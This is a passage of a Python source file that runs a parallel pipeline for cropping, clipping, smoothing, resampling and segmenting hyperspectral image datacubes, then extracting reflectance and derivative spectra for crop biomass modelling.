                method, mask_percentile, get_side_inverse(mask_side))
    elif row['segment']['method'] == ['mcari2', 'mcari2']:
        method = row['segment']['method']
        wl1 = row['segment']['wl1']
        wl2 = row['segment']['wl2']
        wl3 = row['segment']['wl3']
        mask_percentile = row['segment']['mask_percentile']
        mask_side = row['segment']['mask_side']
        segment_type = 'seg_{0}_between_{1}_{2}_pctl'.format(
            method[0], mask_percentile[0], mask_percentile[1])
    elif isinstance(row['segment']['method'], list) and row['segment']['method'][1] != 'mcari2':
        method = row['segment']['method']
        wl1 = row['segment']['wl1']
        wl2 = row['segment']['wl2']
        wl3 = row['segment']['wl3']
        mask_percentile = row['segment']['mask_percentile']
        mask_side = row['segment']['mask_side']
        if method == ['mcari2', [545, 565]]:
            segment_type = 'seg_mcari2_{0}_{1}_green_{2}_{3}'.format(
                mask_percentile[0], get_side_inverse(mask_side[0]),
                mask_percentile[1], get_side_inverse(mask_side[1]))
        elif method == ['mcari2', [800, 820]]:
            segment_type = 'seg_mcari2_{0}_{1}_nir_{2}_{3}'.format(
                mask_percentile[0], get_side_inverse(mask_side[0]),
                mask_percentile[1], get_side_inverse(mask_side[1]))
    return segment_type, method, wl1, wl2, wl3, mask_percentile, mask_side


def smooth_get_base_dir(dir_data, panel_type, crop_type, clip_type):
    '''
    Gets the base directory for the smoothed images.
    '''
    if clip_type == 'clip_none':
        base_dir = os.path.join(dir_data, panel_type, crop_type)
    else:
        base_dir = os.path.join(dir_data, panel_type, crop_type, clip_type)
    return base_dir


def bin_get_base_dir(dir_data, panel_type, crop_type, clip_type, smooth_type):
    '''
    Gets the base directory for the binned images.
    '''
    if smooth_type == 'smooth_none' and clip_type == 'clip_none':
        base_dir = os.path.join(dir_data, panel_type, crop_type)
    elif smooth_type == 'smooth_none' and clip_type != 'clip_none':
        base_dir = os.path.join(dir_data, panel_type, crop_type, clip_type)
    else:  # smooth_type != 'smooth_none'
        base_dir = os.path.join(dir_data, panel_type, crop_type, clip_type,
                                smooth_type)
    return base_dir


def seg_get_base_dir(dir_data, panel_type, crop_type, clip_type, smooth_type,
                     bin_type):
    '''
    Gets the base directory for the segmented images.
    '''
    if bin_type == 'bin_none' and smooth_type == 'smooth_none' and clip_type == 'clip_none':
        base_dir = os.path.join(dir_data, panel_type, crop_type)
    elif bin_type == 'bin_none' and smooth_type == 'smooth_none' and clip_type != 'clip_none':
        base_dir = os.path.join(dir_data, panel_type, crop_type, clip_type)
    elif bin_type == 'bin_none' and smooth_type != 'smooth_none':
        base_dir = os.path.join(dir_data, panel_type, crop_type, clip_type,
                                smooth_type)
    else:  # bin_type != 'bin_none'
        base_dir = os.path.join(dir_data, panel_type, crop_type, clip_type,
                                smooth_type, bin_type)
    return base_dir


def crop(df_crop, panel_type, dir_out_crop, out_force=True, n_files=854,
         gdf_aerf=None, gdf_wells=None):
    '''
    Gets the cropping info for each site and crops all the datacubes.

    Parameters:
        df_crop (``pandas.DataFrame``): a dataframe containing all the
            cropping instructions for all the input datacubes
    '''
    if check_processing(dir_out_crop, ext='.bip', n_files=n_files):
        return
    folder_name = None
    name_append = os.path.split(dir_out_crop)[-1].replace('_', '-')
    if panel_type == 'ref_closest_panel':  # data doesn't exist for 7/23 aerf small plot
        df_crop_aerf_small = df_crop[(df_crop['study'] == 'aerfsmall') &
                                     (df_crop['date'] != datetime(2019, 7, 23))]
    else:
        df_crop_aerf_small = df_crop[df_crop['study'] == 'aerfsmall']
    df_crop_aerf_whole = df_crop[df_crop['study'] == 'aerffield']
    df_crop_wells_18 = df_crop[(df_crop['study'] == 'wells') &
                               (df_crop['date'].dt.year == 2018)]
    df_crop_wells_19 = df_crop[(df_crop['study'] == 'wells') &
                               (df_crop['date'].dt.year == 2019)]
    hsbatch = batch()
    hsbatch.io.set_io_defaults(force=out_force)
    hsbatch.spatial_crop(fname_sheet=df_crop_wells_18, method='many_gdf',
                         gdf=gdf_wells, base_dir_out=dir_out_crop,
                         folder_name=folder_name, name_append=name_append)
    hsbatch.spatial_crop(fname_sheet=df_crop_wells_19, method='many_gdf',
                         gdf=gdf_wells, base_dir_out=dir_out_crop,
                         folder_name=folder_name, name_append=name_append)
    hsbatch.spatial_crop(fname_sheet=df_crop_aerf_small, method='single',
                         base_dir_out=dir_out_crop, folder_name=folder_name,
                         name_append=name_append)
    hsbatch.spatial_crop(fname_sheet=df_crop_aerf_whole, method='many_gdf',
                         gdf=gdf_aerf, base_dir_out=dir_out_crop,
                         folder_name=folder_name, name_append=name_append)


def chunk_by_n(array, n):
    np.random.shuffle(array)  # studies have different size images, so shuffling makes each chunk more similar
    arrays = np.array_split(array, n)
    list_out = []
    for l in arrays:
        list_out.append(l.tolist())
    return list_out
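# --- Example: splitting a file list into balanced chunks ---
# Order is randomized in place, but the chunk sizes are deterministic:
#
#   >>> chunks = chunk_by_n(list(range(10)), 3)
#   >>> sorted(len(c) for c in chunks)
#   [3, 3, 4]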
def check_missed_files(fname_list, base_dir_out, ext_out, f_pp, row,
                       base_dir_f, out_force, lock):
    '''
    Checks if any files were not processed that were supposed to be
    processed.

    Parameters:
        f_pp (function): The parallel processing function to run to complete
            the processing of the missing files.
        **kwargs (dict): keyword arguments to pass to f_pp.
    '''
    # Goal: take out filepaths and end text
    to_process = [os.path.splitext(os.path.basename(i))[0].rsplit('-')[0]
                  for i in fname_list]
    name_ex, ext = os.path.splitext(fname_list[0])
    end_str = '-' + '-'.join(name_ex.split('-')[1:]) + ext
    # Find processed files without filepaths and end text
    fname_list_complete = fnmatch.filter(os.listdir(base_dir_out), '*' + ext_out)  # no filepath
    processed = [os.path.splitext(i)[0].split('-')[0] for i in fname_list_complete]
    missed = [f for f in to_process if f not in processed]
    base_dir = os.path.dirname(fname_list[0])
    fname_list_missed = [os.path.join(base_dir, f + end_str) for f in missed]
    if len(missed) > 0:
        print('There were {0} images that slipped through the cracks. '
              'Processing them manually now...\n'.format(len(missed)))
        print('Directory: {0}'.format(base_dir))
        print('Here are the missed images:\n{0}\n'.format(missed))
        f_pp(fname_list_missed, row, base_dir_f, out_force, lock)


def clip(dir_data, row, out_force=True, n_files=854):
    '''
    Clips each of the datacubes according to instructions in df_grid.
    '''
    panel_type = row['dir_panels']
    crop_type = row['crop']
    clip_type, wl_bands = get_clip_type(row)
    base_dir = os.path.join(dir_data, panel_type, crop_type)
    dir_out_clip = os.path.join(dir_data, panel_type, crop_type, clip_type)
    if check_processing(dir_out_clip, ext='.bip', n_files=n_files):
        return
    if wl_bands is not None:
        folder_name = None
        name_append = os.path.split(dir_out_clip)[-1].replace('_', '-')
        hsbatch = batch()
        hsbatch.io.set_io_defaults(force=out_force)
        hsbatch.spectral_clip(base_dir=base_dir, folder_name=folder_name,
                              name_append=name_append,
                              base_dir_out=dir_out_clip, wl_bands=wl_bands)
    else:
        print('Clip: ``clip_type`` is None, so there is nothing to process.')


def clip_f_pp(fname_list_clip, row, dir_out_clip, out_force, lock):
    '''
    Parallel processing: clips each of the datacubes according to
    instructions in df_grid organized for multi-core processing.

    These are the lines of code that have to be passed as a function to
    ProcessPoolExecutor().

    Note: this function now takes ``row`` (like ``bin_f_pp``) and derives
    ``wl_bands`` itself, so its signature matches the
    ``f_pp(fname_list, row, ...)`` callback that ``check_missed_files()``
    re-runs; the original passed ``wl_bands`` directly, which that callback
    could not supply.
    '''
    _, wl_bands = get_clip_type(row)
    assert wl_bands is not None, ('``wl_bands`` must not be ``None``')
    hsbatch = batch(lock=lock)
    hsbatch.io.set_io_defaults(force=out_force)
    folder_name = None
    name_append = os.path.split(dir_out_clip)[-1].replace('_', '-')
    hsbatch.spectral_clip(fname_list=fname_list_clip, folder_name=folder_name,
                          name_append=name_append, base_dir_out=dir_out_clip,
                          wl_bands=wl_bands)


def clip_pp(dir_data, row, n_jobs, out_force=True, n_files=854):
    '''
    Actual execution of band clipping via multi-core processing.
    '''
    m = Manager()
    lock = m.Lock()
    panel_type = row['dir_panels']
    crop_type = row['crop']
    clip_type, wl_bands = get_clip_type(row)
    base_dir = os.path.join(dir_data, panel_type, crop_type)
    dir_out_clip = os.path.join(dir_data, panel_type, crop_type, clip_type)
    already_processed = check_processing(dir_out_clip, ext='.bip',
                                         n_files=n_files)
    if out_force is False and already_processed is True:
        fname_list = []
    elif clip_type == 'clip_none':
        fname_list = []
    else:
        fname_list = fnmatch.filter(os.listdir(base_dir), '*.bip')  # no filepath
        fname_list = [os.path.join(base_dir, f) for f in fname_list]
    if len(fname_list) == 0:
        print('Clip: either ``clip_type`` is None (so there is nothing to '
              'process), or all the images are already processed.')
    else:
        chunks = chunk_by_n(fname_list, n_jobs*2)
        with ProcessPoolExecutor(max_workers=n_jobs) as executor:
            executor.map(
                clip_f_pp, chunks, it.repeat(row), it.repeat(dir_out_clip),
                it.repeat(out_force), it.repeat(lock))
        ext_out = '.bip'
        check_missed_files(fname_list, dir_out_clip, ext_out, clip_f_pp, row,
                           dir_out_clip, out_force, lock)


def smooth(dir_data, row, out_force=True, n_files=854):
    '''
    Smooths each of the datacubes according to instructions in df_grid.
    '''
    panel_type = row['dir_panels']
    crop_type = row['crop']
    clip_type, wl_bands = get_clip_type(row)
    smooth_type, window_size, order = get_smooth_type(row)
    base_dir = smooth_get_base_dir(dir_data, panel_type, crop_type, clip_type)
    dir_out_smooth = os.path.join(dir_data, panel_type, crop_type, clip_type,
                                  smooth_type)
    if check_processing(dir_out_smooth, ext='.bip', n_files=n_files):
        return
    if window_size is not None and order is not None:
        folder_name = None
        name_append = os.path.split(dir_out_smooth)[-1].replace('_', '-')
        hsbatch = batch()
        hsbatch.io.set_io_defaults(force=out_force)
        hsbatch.spectral_smooth(base_dir=base_dir, folder_name=folder_name,
                                name_append=name_append,
                                base_dir_out=dir_out_smooth,
                                window_size=window_size, order=order)
    else:
        print('Smooth: ``smooth_type`` is None, so there is nothing to process.')


def smooth_f_pp(fname_list_smooth, row, dir_out_smooth, out_force, lock):
    '''
    Parallel processing: smooths each of the datacubes according to
    instructions in df_grid organized for multi-core processing.

    Note: takes ``row`` (like ``bin_f_pp``) and derives ``window_size`` and
    ``order`` itself, so its signature matches the ``f_pp`` callback that
    ``check_missed_files()`` expects.
    '''
    _, window_size, order = get_smooth_type(row)
    msg = ('``window_size`` and ``order`` must not be ``None``')
    assert window_size is not None and order is not None, msg
    hsbatch = batch(lock=lock)
    hsbatch.io.set_io_defaults(force=out_force)
    folder_name = None
    name_append = os.path.split(dir_out_smooth)[-1].replace('_', '-')
    hsbatch.spectral_smooth(
        fname_list=fname_list_smooth, folder_name=folder_name,
        name_append=name_append, base_dir_out=dir_out_smooth,
        window_size=window_size, order=order)


def smooth_pp(dir_data, row, n_jobs, out_force=True, n_files=854):
    '''
    Actual execution of band smoothing via multi-core processing.
    '''
    m = Manager()
    lock = m.Lock()
    panel_type = row['dir_panels']
    crop_type = row['crop']
    clip_type, wl_bands = get_clip_type(row)
    smooth_type, window_size, order = get_smooth_type(row)
    base_dir = smooth_get_base_dir(dir_data, panel_type, crop_type, clip_type)
    dir_out_smooth = os.path.join(dir_data, panel_type, crop_type, clip_type,
                                  smooth_type)
    already_processed = check_processing(dir_out_smooth, ext='.bip',
                                         n_files=n_files)
    if out_force is False and already_processed is True:
        fname_list = []
    elif smooth_type == 'smooth_none':
        fname_list = []
    else:
        fname_list = fnmatch.filter(os.listdir(base_dir), '*.bip')  # no filepath
        fname_list = [os.path.join(base_dir, f) for f in fname_list]
    if len(fname_list) == 0:
        print('Smooth: either ``smooth_type`` is None (so there is nothing '
              'to process), or all the images are already processed.')
    else:
        # chunk_by_n() already shuffles, so no extra shuffle is needed here.
        chunks = chunk_by_n(fname_list, n_jobs*2)
        with ProcessPoolExecutor(max_workers=n_jobs) as executor:
            executor.map(
                smooth_f_pp, chunks, it.repeat(row),
                it.repeat(dir_out_smooth), it.repeat(out_force),
                it.repeat(lock))
        ext = '.bip'
        check_missed_files(fname_list, dir_out_smooth, ext, smooth_f_pp, row,
                           dir_out_smooth, out_force, lock)


def bin_f_pp(fname_list_bin, row, dir_out_bin, out_force, lock):
    '''
    Parallel processing: spectral mimic/resampling for each of the datacubes
    according to instructions in df_grid organized for multi-core processing.
    '''
    bin_type, method_bin, sensor, bandwidth = get_bin_type(row)
    msg = ('``bin_type`` must not be ``None``')
    assert bin_type is not None, msg
    hsbatch = batch(lock=lock)
    hsbatch.io.set_io_defaults(force=out_force)
    folder_name = None
    name_append = os.path.split(dir_out_bin)[-1].replace('_', '-')
    if method_bin == 'spectral_resample':
        hsbatch.spectral_resample(
            fname_list=fname_list_bin, folder_name=folder_name,
            name_append=name_append, base_dir_out=dir_out_bin,
            bandwidth=bandwidth)
    elif method_bin == 'spectral_mimic':
        hsbatch.spectral_mimic(
            fname_list=fname_list_bin, folder_name=folder_name,
            name_append=name_append, base_dir_out=dir_out_bin,
            sensor=sensor)
    else:
        print('Bin: method "{0}" is not supported.'.format(method_bin))


def bin_pp(dir_data, row, n_jobs, out_force=True, n_files=854):
    '''
    Actual execution of spectral resampling/mimicking via multi-core
    processing.
    '''
    m = Manager()
    lock = m.Lock()
    panel_type = row['dir_panels']
    crop_type = row['crop']
    clip_type, wl_bands = get_clip_type(row)
    smooth_type, window_size, order = get_smooth_type(row)
    bin_type, method_bin, sensor, bandwidth = get_bin_type(row)
    base_dir = bin_get_base_dir(dir_data, panel_type, crop_type, clip_type,
                                smooth_type)
    dir_out_bin = os.path.join(dir_data, panel_type, crop_type, clip_type,
                               smooth_type, bin_type)
    already_processed = check_processing(dir_out_bin, ext='.bip',
                                         n_files=n_files)
    if out_force is False and already_processed is True:
        fname_list = []
    elif bin_type == 'bin_none':
        fname_list = []
    else:
        fname_list = fnmatch.filter(os.listdir(base_dir), '*.bip')  # no filepath
        fname_list = [os.path.join(base_dir, f) for f in fname_list]
    if len(fname_list) == 0:
        print('Bin: either ``bin_type`` is None (so there is nothing to '
              'process), or all the images are already processed.')
    else:
        chunks = chunk_by_n(fname_list, n_jobs*2)
        with ProcessPoolExecutor(max_workers=n_jobs) as executor:
            executor.map(
                bin_f_pp, chunks, it.repeat(row), it.repeat(dir_out_bin),
                it.repeat(out_force), it.repeat(lock))
        ext = '.bip'
        check_missed_files(fname_list, dir_out_bin, ext, bin_f_pp, row,
                           dir_out_bin, out_force, lock)


def parse_wls(wl, idx=0):
    '''
    Require that wl is a list; if a range of wls is desired, the min and max
    should be in the list. If there are two items in a list, and both are
    also lists, then it's a two-step segmentation process. If two-step
    process (wl is a list of lists), then idx should be passed to indicate
    which list to use.
    '''
    if isinstance(wl, list) and len(wl) == 1:
        wl_n = int(wl[0])
        wl_str = str(int(wl[0]))
    elif isinstance(wl, list) and len(wl) == 2:
        if isinstance(wl[0], list):  # two-step process
            wl_n = int(np.mean(wl[idx]))
            wl_str = str(int(wl_n))
        else:  # take the average
            wl_n = int(np.mean(wl))
            wl_str = str(int(wl_n))
    elif isinstance(wl, int):
        wl_n = wl
        wl_str = str(wl)
    elif isinstance(wl, float):
        wl_n = int(wl)
        wl_str = str(int(wl))
    return wl_n, wl_str
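# --- Example: resolving wavelength specifications ---
# A single-step range takes the mean of its endpoints; for a two-step
# (list-of-lists) spec, ``idx`` selects which list to average:
#
#   >>> parse_wls([770, 800])
#   (785, '785')
#   >>> parse_wls([[545, 565], [800, 820]], idx=1)
#   (810, '810')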
def get_side_inverse(mask_side):
    '''
    Gets the inverse of mask side.
    '''
    if mask_side == 'lower':
        mask_side_inv = 'upper'
    elif mask_side == 'upper':
        mask_side_inv = 'lower'
    elif mask_side == 'outside':
        mask_side_inv = 'between'
    elif mask_side == 'between':
        mask_side_inv = 'outside'
    return mask_side_inv


def seg_spec_and_derivative(fname_list_seg, dir_out_mask, name_append, hsbatch):
    '''
    Calculates spectra and derivative spectra for all files and saves to
    "reflectance" and "derivative_x" folders.
    '''
    fname_list_names = [os.path.splitext(os.path.basename(f))[0].split('-')[0]
                        for f in fname_list_seg]
    # If seg is None, then be sure to grab dirname(fname_list_seg[0])
    if os.path.split(dir_out_mask)[-1] == 'seg_none':
        dir_unmask = os.path.dirname(fname_list_seg[0])
        fname_sample = fnmatch.filter(os.listdir(dir_unmask), '*.bip')[0]
        name_append_dirname = os.path.splitext(fname_sample)[0].split('-', maxsplit=1)[-1]
        fname_list_mask = [os.path.join(dir_unmask, f) + '-' + name_append_dirname + '.bip'
                           for f in fname_list_names]
    else:
        fname_list_mask = [os.path.join(dir_out_mask, f) + '-' + name_append + '.bip'
                           for f in fname_list_names]
    hsbatch.cube_to_spectra(
        fname_list=fname_list_mask, base_dir_out=dir_out_mask,
        folder_name='reflectance', name_append=name_append,
        write_geotiff=False)

    dir_out_spec = os.path.join(dir_out_mask, 'reflectance')
    fname_list_der = [os.path.join(dir_out_spec, f) + '-' + name_append + '-mean.spec'
                      for f in fname_list_names]
    name_append_der = name_append + '-derivative'
    hsbatch.spectra_derivative(
        fname_list=fname_list_der, name_append=name_append_der, order=1,
        base_dir_out=dir_out_mask, folder_name='derivative_1')
    hsbatch.spectra_derivative(
        fname_list=fname_list_der, name_append=name_append_der, order=2,
        base_dir_out=dir_out_mask, folder_name='derivative_2')
    hsbatch.spectra_derivative(
        fname_list=fname_list_der, name_append=name_append_der, order=3,
        base_dir_out=dir_out_mask, folder_name='derivative_3')


def seg_zero_step(fname_list_seg, base_dir_bm, hsbatch, row):
    '''
    During the analysis, we may want to include auxiliary features from the
    band math in addition to the spectral features. Therefore, we must be
    sure to perform the band math even if it is not used for segmentation so
    it is available during model training.

    base_dir can also be a list of filenames (implemented for multi-core
    processing).
    '''
    segment_type, _, _, _, _, _, _ = get_segment_type(row)
    dir_out_mask = os.path.join(base_dir_bm, segment_type)
    name_append = segment_type.replace('_', '-')
    seg_spec_and_derivative(fname_list_seg, dir_out_mask, name_append, hsbatch)

    folder_name = 'bm_mcari2'
    name_append = folder_name.replace('_', '-')
    hsbatch.segment_band_math(
        fname_list=fname_list_seg, folder_name=folder_name,
        name_append=name_append, base_dir_out=base_dir_bm,
        write_geotiff=False, method='mcari2', wl1=[800], wl2=[670],
        wl3=[550], plot_out=False, out_force=False)

    folder_name = 'bm_ndi'
    name_append = folder_name.replace('_', '-')
    hsbatch.segment_band_math(
        fname_list=fname_list_seg, folder_name=folder_name,
        name_append=name_append, base_dir_out=base_dir_bm,
        write_geotiff=False, method='ndi', wl1=[770, 800], wl2=[650, 680],
        plot_out=False, out_force=False)


def seg_one_step(fname_list_seg, base_dir_bm, hsbatch, row):
    '''
    Performs band math, then performs one-step segmentation. "One-step"
    refers to having only a single masking step rather than two masking steps
    (e.g., mask below 75th pctl then above 95th pctl).

    fname_list_seg should be a list of filenames (implemented for multi-core
    processing).
    '''
    segment_type, method, wl1, wl2, wl3, mask_percentile, mask_side = get_segment_type(row)
    if isinstance(method, str):
        folder_name = 'bm_{0}'.format(method)
        name_append = folder_name.replace('_', '-')
        base_dir_bm = os.path.join(base_dir_bm, folder_name)
        hsbatch.segment_band_math(
            fname_list=fname_list_seg, folder_name=None,
            name_append=name_append, base_dir_out=base_dir_bm,
            write_geotiff=False, method=method, wl1=wl1, wl2=wl2, wl3=wl3,
            plot_out=False, out_force=False)
    elif method == [545, 565]:
        folder_name = 'bm_green'
        name_append = folder_name.replace('_', '-')
        base_dir_bm = os.path.join(base_dir_bm, folder_name)
        hsbatch.segment_composite_band(
            fname_list=fname_list_seg, folder_name=None,
            name_append=name_append, base_dir_out=base_dir_bm,
            write_geotiff=False, wl1=method, list_range=True,
            plot_out=False, out_force=False)
    elif method == [800, 820]:
        folder_name = 'bm_nir'
        name_append = folder_name.replace('_', '-')
        base_dir_bm = os.path.join(base_dir_bm, folder_name)
        hsbatch.segment_composite_band(
            fname_list=fname_list_seg, folder_name=None,
            name_append=name_append, base_dir_out=base_dir_bm,
            write_geotiff=False, wl1=method, list_range=True,
            plot_out=False, out_force=False)
    dir_out_mask = os.path.join(os.path.split(base_dir_bm)[0], segment_type)
    name_append = segment_type.replace('_', '-')
    hsbatch.segment_create_mask(
        fname_list=fname_list_seg, mask_dir=base_dir_bm, folder_name=None,
        name_append=name_append, base_dir_out=dir_out_mask,
        write_datacube=True, write_spec=False, write_geotiff=False,
        mask_percentile=mask_percentile, mask_side=mask_side,
        out_force=True)
    seg_spec_and_derivative(fname_list_seg, dir_out_mask, name_append, hsbatch)


def seg_two_step(fname_list_seg, base_dir_bm, hsbatch, row):
    '''
    Performs band math, then performs two-step segmentation. "Two-step"
    refers to having more than a single masking step rather than a simple
    single masking step (e.g., mask only below 90th pctl).
    '''
    segment_type, methods, wl1, wl2, wl3, mask_percentiles, mask_sides = get_segment_type(row)
    mask_dirs = []
    for i, method in enumerate(methods):
        if isinstance(method, str):  # if method == 'mcari2':
            folder_name = 'bm_{0}'.format(method)
            name_append = folder_name.replace('_', '-')
            mask_dirs.append(os.path.join(base_dir_bm, folder_name))
            hsbatch.segment_band_math(
                fname_list=fname_list_seg, folder_name=None,
                name_append=name_append, base_dir_out=mask_dirs[i],
                write_geotiff=False, method=method, wl1=wl1[i], wl2=wl2[i],
                wl3=wl3[i], plot_out=False)
        elif method == [545, 565]:
            folder_name = 'bm_green'
            name_append = folder_name.replace('_', '-')
            mask_dirs.append(os.path.join(base_dir_bm, folder_name))
            hsbatch.segment_composite_band(
                fname_list=fname_list_seg, folder_name=None,
                name_append=name_append, base_dir_out=mask_dirs[i],
                write_geotiff=False, wl1=method, list_range=True,
                plot_out=False)
        elif method == [800, 820]:
            folder_name = 'bm_nir'
            name_append = folder_name.replace('_', '-')
            mask_dirs.append(os.path.join(base_dir_bm, folder_name))
            hsbatch.segment_composite_band(
                fname_list=fname_list_seg, folder_name=None,
                name_append=name_append, base_dir_out=mask_dirs[i],
                write_geotiff=False, wl1=method, list_range=True,
                plot_out=False)
    dir_out_mask = os.path.join(os.path.split(mask_dirs[0])[0], segment_type)
    name_append = segment_type.replace('_', '-')
    hsbatch.segment_create_mask(  # it would be much faster to write_spec, but then we have to reorganize reflectance, derivative folders
        fname_list=fname_list_seg, mask_dir=mask_dirs, folder_name=None,
        name_append=name_append, base_dir_out=dir_out_mask,
        write_datacube=True, write_spec=False, write_geotiff=False,
        mask_percentile=mask_percentiles, mask_side=mask_sides,
        out_force=False)
    seg_spec_and_derivative(fname_list_seg, dir_out_mask, name_append, hsbatch)


def seg(dir_data, row, out_force=True, n_files=854):
    '''
    Segments each of the datacubes according to instructions in df_grid.
    This is the high level function that accesses seg_zero_step,
    seg_one_step, or seg_two_step.
    '''
    panel_type = row['dir_panels']
    crop_type = row['crop']
    clip_type, wl_bands = get_clip_type(row)
    smooth_type, window_size, order = get_smooth_type(row)
    bin_type, _, _, _ = get_bin_type(row)
    segment_type, method, _, _, _, _, _ = get_segment_type(row)
    base_dir = seg_get_base_dir(dir_data, panel_type, crop_type, clip_type,
                                smooth_type, bin_type)
    base_dir_bm = os.path.join(dir_data, panel_type, crop_type, clip_type,
                               smooth_type)
    dir_out_mask = os.path.join(dir_data, panel_type, crop_type, clip_type,
                                smooth_type, segment_type)
    if check_processing(dir_out_mask, ext='.bip', n_files=n_files):
        return
    hsbatch = batch()
    hsbatch.io.set_io_defaults(force=out_force)
    if isinstance(method, list) and len(method) == 2:  # two step
        seg_two_step(base_dir, base_dir_bm, hsbatch, row)
    elif method is not None:  # one step
        seg_one_step(base_dir, base_dir_bm, hsbatch, row)
    else:  # just create the spectra
        print('Segment: ``segment_type`` is None, so there will not be any ' 'segmentation/masking performed. 
However, MCARI2 band math will ' 'still be performed so data are available when tuning/training ' 'the models with auxiliary features.') seg_zero_step(base_dir, base_dir_bm, hsbatch, row) name_append = segment_type.replace('_', '-') hsbatch.cube_to_spectra(base_dir=base_dir, folder_name=segment_type, name_append=name_append, base_dir_out=base_dir_bm, write_geotiff=False) def seg_f_pp(fname_list_seg, row, base_dir_bm, out_force, lock): ''' Parallel processing: segments each of the datacubes according to instructions in df_grid organized for multi-core processing. ''' _, method_seg, _, _, _, _, _ = get_segment_type(row) hsbatch = batch(lock=lock) hsbatch.io.set_io_defaults(force=out_force) if isinstance(method_seg, list) and len(method_seg) == 2: # two step seg_two_step(fname_list_seg, base_dir_bm, hsbatch, row) elif method_seg is not None: # one step seg_one_step(fname_list_seg, base_dir_bm, hsbatch, row) else: seg_zero_step(fname_list_seg, base_dir_bm, hsbatch, row) def seg_pp(dir_data, row, n_jobs, out_force=True, n_files=854): ''' Actual execution of band smoothing via multi-core processing ''' m = Manager() lock = m.Lock() panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, _ = get_clip_type(row) smooth_type, _, _ = get_smooth_type(row) bin_type, _, _, _ = get_bin_type(row) segment_type, method_seg, _, _, _, _, _ = get_segment_type(row) base_dir = seg_get_base_dir(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type) base_dir_bm = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type) dir_out_mask = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type, segment_type) dir_out_spec = os.path.join(dir_out_mask, 'reflectance') # dir_out_der1 = os.path.join(dir_out_mask, 'derivative_1') pathlib.Path(dir_out_spec).mkdir(parents=True, exist_ok=True) proc_mask = check_processing(dir_out_mask, ext='.bip', n_files=n_files) proc_spec = check_processing(dir_out_spec, ext='.spec', n_files=n_files) # proc_der = check_processing(dir_out_der1, ext='.spec', n_files=n_files) if out_force is False and proc_mask is True and proc_spec is True: fname_list = [] # elif segment_type == 'seg_none': # can't do this because we still have to run seg_zero_step # fname_list = [] else: fname_list = fnmatch.filter(os.listdir(base_dir), '*.bip') # no filepath fname_list = [os.path.join(base_dir, f) for f in fname_list] # fname_list = recurs_dir(base_dir, search_ext='.bip', level=0) if len(fname_list) == 0: print('Segment: all images are already processed.\n') else: if method_seg is None: print('Segment: ``segment_type`` is None, so there will not be any ' 'segmentation/masking performed. 
Mean spectra and derivative ' 'spectra are being extracted...') chunks = chunk_by_n(fname_list, n_jobs*2) # print('Length of fname_list: {0}'.format(len(fname_list))) # print('Number of chunks: {0}'.format(len(chunks))) chunk_avg = sum([len(i) for i in chunks]) / len(chunks) # print('Average length of each chunk: {0:.1f}'.format(chunk_avg)) # print('Number of cores: {0}\n'.format(n_jobs)) with ProcessPoolExecutor(max_workers=n_jobs) as executor: executor.map( seg_f_pp, chunks, it.repeat(row), it.repeat(base_dir_bm), it.repeat(out_force), it.repeat(lock)) ext_out = '.spec' check_missed_files(fname_list, dir_out_spec, ext_out, seg_f_pp, row, base_dir_bm, out_force, lock) def feats_f_pp(fname_list_derivative, dir_out_derivative, name_append, out_force, lock): ''' Parallel processing: calculates the derivative spectra for each of the datacubes according to instructions in df_grid organized for multi-core processing. ''' hsbatch = batch(lock=lock) hsbatch.io.set_io_defaults(force=out_force) folder_name = None # name_append = os.path.split(dir_out_derivative)[-1].replace('_', '-') hsbatch.spectra_derivative( fname_list=fname_list_derivative, folder_name=None, name_append=name_append, base_dir_out=dir_out_derivative) def feats_pp(dir_data, row, n_jobs, out_force=True, n_files=854): ''' Actual execution of spectral derivative calculation via multi-core processing ''' m = Manager() lock = m.Lock() panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, wl_bands = get_clip_type(row) smooth_type, window_size, order = get_smooth_type(row) bin_type, _, _, _ = get_bin_type(row) segment_type, method_seg, _, _, _, _, _ = get_segment_type(row) feature_type = row['features'] if feature_type == 'reflectance' or feature_type is None: # we don't have to do anything since this was already done in segmentatino step print('Features: ``feature_type`` is either None or "reflectance" and ' 'there is nothing to process.') return # base_dir_feat = seg_get_base_dir(dir_data, panel_type, crop_type, # clip_type, smooth_type, bin_type) base_dir = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type, segment_type) dir_out_derivative = os.path.join(base_dir, feature_type) name_append = segment_type.replace('_', '-') # want to keep this to keep file names unique already_processed = check_processing(dir_out_derivative, ext='.spec', n_files=n_files) if out_force is False and already_processed is True: fname_list = [] else: fname_list = recurs_dir(os.path.join(base_dir, 'reflectance'), search_ext='.spec', level=0) chunk_size = int(len(fname_list) / (n_jobs*2)) np.random.shuffle(fname_list) # studies have different size images, so shuffling makes each chunk more similar chunks = chunk_by_n(fname_list, n_jobs*2) with ProcessPoolExecutor(max_workers=n_jobs) as executor: executor.map( feats_f_pp, chunks, it.repeat(dir_out_derivative), it.repeat(name_append), it.repeat(out_force), it.repeat(lock)) # In[Training initialization functions] def load_ground_data(dir_data, y_label='biomass_kgha'): ''' Loads the ground data for supervised regression. 
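    The three source CSVs (Wells 2018, Wells 2019, and AERF 2019) are read
    from ``dir_data``, rows with a null ``y_label`` are dropped, and the
    three are concatenated into one ground-truth dataframe.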
